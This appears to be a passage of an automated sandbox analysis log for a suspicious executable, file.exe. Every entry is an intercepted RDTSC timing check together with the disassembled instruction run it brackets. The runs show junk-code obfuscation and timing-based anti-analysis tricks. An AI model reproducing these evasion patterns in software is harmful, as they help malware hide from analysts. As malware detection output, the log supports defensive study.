                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70CE5 second address: A70CEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70CEB second address: A70CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70CEF second address: A70D16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FDF30F40A5Ah 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDF30F40A5Dh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70D16 second address: A70D3A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FDF30D0E300h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 jne 00007FDF30D0E2F6h 0x00000018 pop ebx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70D3A second address: A70D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70D40 second address: A70D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70D44 second address: A70D48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70D48 second address: A70D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000003h 0x0000000b sub edi, dword ptr [ebp+122D2C26h] 0x00000011 push 00000000h 0x00000013 mov ecx, dword ptr [ebp+122D2BDEh] 0x00000019 sub ecx, dword ptr [ebp+122D3275h] 0x0000001f push 00000003h 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007FDF30D0E2F8h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b sub dword ptr [ebp+122D1C00h], ebx 0x00000041 call 00007FDF30D0E2F9h 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70D9C second address: A70DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70DA0 second address: A70DC8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDF30D0E2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDF30D0E307h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70ED1 second address: A70F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D233Bh], esi 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FDF30F40A58h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 movsx ecx, bx 0x0000002b mov esi, 54580EAAh 0x00000030 mov dword ptr [ebp+122D1A97h], eax 0x00000036 call 00007FDF30F40A59h 0x0000003b pushad 0x0000003c push edi 0x0000003d jo 00007FDF30F40A56h 0x00000043 pop edi 0x00000044 jmp 00007FDF30F40A5Dh 0x00000049 popad 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push edi 0x0000004e jl 00007FDF30F40A56h 0x00000054 pop edi 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70F36 second address: A70F3B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70F3B second address: A70F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70F4B second address: A70F6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007FDF30D0E2FDh 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 jl 00007FDF30D0E2F6h 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71048 second address: A7104C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7104C second address: A7105A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E2FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A710EA second address: A71102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 je 00007FDF30F40A5Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71102 second address: A71108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71108 second address: A71139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov edi, 6F07C50Eh 0x0000000c push 00000000h 0x0000000e jmp 00007FDF30F40A5Dh 0x00000013 push EAB50ECFh 0x00000018 pushad 0x00000019 jbe 00007FDF30F40A5Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71139 second address: A7113D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7113D second address: A711B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 154AF1B1h 0x0000000e call 00007FDF30F40A67h 0x00000013 jmp 00007FDF30F40A5Ah 0x00000018 pop esi 0x00000019 push 00000003h 0x0000001b mov dword ptr [ebp+122D190Fh], edi 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FDF30F40A58h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d sub dword ptr [ebp+122D291Bh], edi 0x00000043 push 00000003h 0x00000045 mov si, cx 0x00000048 call 00007FDF30F40A59h 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 push edi 0x00000051 pop edi 0x00000052 push edx 0x00000053 pop edx 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A711B3 second address: A711CE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDF30D0E2FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FDF30D0E2F6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A711CE second address: A711D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A711D4 second address: A711EE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDF30D0E2F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jnc 00007FDF30D0E2F6h 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A711EE second address: A71265 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jo 00007FDF30F40A5Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007FDF30F40A66h 0x0000001f pop eax 0x00000020 mov edx, 48B9AB3Eh 0x00000025 lea ebx, dword ptr [ebp+12452B5Eh] 0x0000002b jmp 00007FDF30F40A66h 0x00000030 xchg eax, ebx 0x00000031 push ebx 0x00000032 jl 00007FDF30F40A61h 0x00000038 pop ebx 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d js 00007FDF30F40A56h 0x00000043 jnc 00007FDF30F40A56h 0x00000049 popad 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71265 second address: A7126B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A912AA second address: A912C2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDF30F40A5Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007FDF30F40A56h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A912C2 second address: A912CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A912CA second address: A912D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FDF30F40A56h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A912D6 second address: A912EB instructions: 0x00000000 rdtsc 0x00000002 je 00007FDF30D0E2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007FDF30D0E2F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F315 second address: A8F31A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F49D second address: A8F4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F641 second address: A8F649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F649 second address: A8F64F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F64F second address: A8F675 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FDF30F40A71h 0x0000000f jmp 00007FDF30F40A65h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F675 second address: A8F679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F679 second address: A8F67E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F7BE second address: A8F7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDF30D0E2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F7C8 second address: A8F7DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F7DD second address: A8F7E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F949 second address: A8F94D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F94D second address: A8F953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8FDD4 second address: A8FDE8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDF30F40A56h 0x00000008 jo 00007FDF30F40A56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8FDE8 second address: A8FDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A87F1B second address: A87F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jc 00007FDF30F40A58h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A87F31 second address: A87F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FDF30D0E308h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9049F second address: A904C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FDF30F40A56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDF30F40A68h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A904C5 second address: A904C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A904C9 second address: A904E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007FDF30F40A61h 0x0000000e jmp 00007FDF30F40A5Bh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90E4F second address: A90E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDF30D0E2F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90E5B second address: A90E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A910F5 second address: A9110F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E2FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93620 second address: A93624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93624 second address: A9362E instructions: 0x00000000 rdtsc 0x00000002 js 00007FDF30D0E2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9362E second address: A93633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A55F8F second address: A55F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDF30D0E2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98DE9 second address: A98DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98DED second address: A98E49 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDF30D0E30Eh 0x00000008 jmp 00007FDF30D0E308h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FDF30D0E308h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push edi 0x0000001a jmp 00007FDF30D0E305h 0x0000001f pop edi 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98E49 second address: A98E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A977A8 second address: A977AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A977AC second address: A977CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDF30F40A5Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FDF30F40A5Ch 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A977CD second address: A977D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97ED1 second address: A97EEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D9AD second address: A9D9B7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDF30D0E2F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E0C2 second address: A9E0C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E0C8 second address: A9E0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E214 second address: A9E219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E219 second address: A9E221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F72D second address: A9F732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F732 second address: A9F746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDF30D0E2F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F746 second address: A9F74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F74A second address: A9F750 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F9A7 second address: A9F9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FDF30F40A56h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FF2E second address: A9FF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FF38 second address: A9FFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30F40A5Dh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d jns 00007FDF30F40A6Dh 0x00000013 pop esi 0x00000014 xchg eax, ebx 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FDF30F40A58h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f jmp 00007FDF30F40A5Ch 0x00000034 nop 0x00000035 push eax 0x00000036 jmp 00007FDF30F40A61h 0x0000003b pop eax 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f jmp 00007FDF30F40A62h 0x00000044 jne 00007FDF30F40A56h 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d jnl 00007FDF30F40A56h 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FFD5 second address: A9FFD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0127 second address: AA0136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30F40A5Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA035F second address: AA0375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDF30D0E2FEh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0510 second address: AA0516 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA130D second address: AA1363 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FDF30D0E304h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FDF30D0E2FAh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FDF30D0E2F8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+1244C40Dh], eax 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1363 second address: AA136A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA136A second address: AA1392 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDF30D0E304h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDF30D0E2FBh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1392 second address: AA139C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDF30F40A5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3B1B second address: AA3B21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
